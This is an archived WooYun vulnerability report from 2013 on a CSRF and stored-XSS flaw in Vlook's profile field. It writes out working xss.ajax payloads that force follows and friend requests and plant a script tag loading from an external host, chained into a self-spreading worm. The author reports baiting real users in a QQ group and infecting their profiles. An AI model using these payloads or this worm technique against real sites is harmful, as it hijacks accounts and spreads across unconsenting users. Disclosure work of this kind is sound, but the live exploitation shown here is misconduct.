当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039094

漏洞标题:微录客某处CSRF漏洞可构造蠕虫

相关厂商:微录客

漏洞作者: M0nster

提交时间:2013-10-09 12:24

修复时间:2013-11-23 12:25

公开时间:2013-11-23 12:25

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

在简介里面没有过滤 直接插入XSS构造蠕虫

详细说明:

先来看看关注,用神器来抓下包

.jpg


是get方式,直接用xss.js来写

xss.ajax('http://service.vlook.cn/ajx/user.addFollow?whom=2005113&rnd=0.6778604593127966')


接下来是加好友

.jpg


抓包

1.jpg


用post方式提交 这里的reqMsg后面就是刚才的申请理由,可以自己更改一下。

xss.ajax('http://service.vlook.cn/ajx/user.requestFriend','fid=2005113&reqMsg=AJAX!')


然后就是改简介了

.jpg


还是先改一下自己的抓包看看,desc=的内容就是简介了,里面写上配置好的xss

2.jpg


post提交

xss.ajax('http://service.vlook.cn/ajx/post.updateUser','nickName=M0nster_WooYun&gender=1&desc=M0nster%40WooYun%3Cscript%20src%3Dhttp%3A%2F%2Fxxxxxx.com%2Fxss%3E%3C%2Fscript%3E&province=%E6%B5%B7%E5%A4%96&city=%E8%B5%9E%E6%AF%94%E4%BA%9A&birthProvince=%E5%8C%97%E4%BA%AC&birthCity=%E4%B8%9C%E5%9F%8E')


之后就是保存让别人去打开你的主页吧
因为这个主要应该是在手机端使用,但是手机端不解析简介里的html,所以只能想办法让用户在电脑端打开你的主页,我在QQ里面搜了个VLOOK的群

QQ截图20131008145404.jpg


漏洞证明:

http://service.vlook.cn/ta/qs/dWlkPTIwMDUxMTM
在群里发了链接之后有人上钩了

.jpg


关注我的人

.jpg


收到的好友申请 申请内容是我该过的“AJAX!”

.jpg


再看看他们的简介吧

.jpg


1.jpg


2.jpg


这样一只蠕虫就蛋生了

修复方案:

token

版权声明:转载请注明来源 M0nster@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论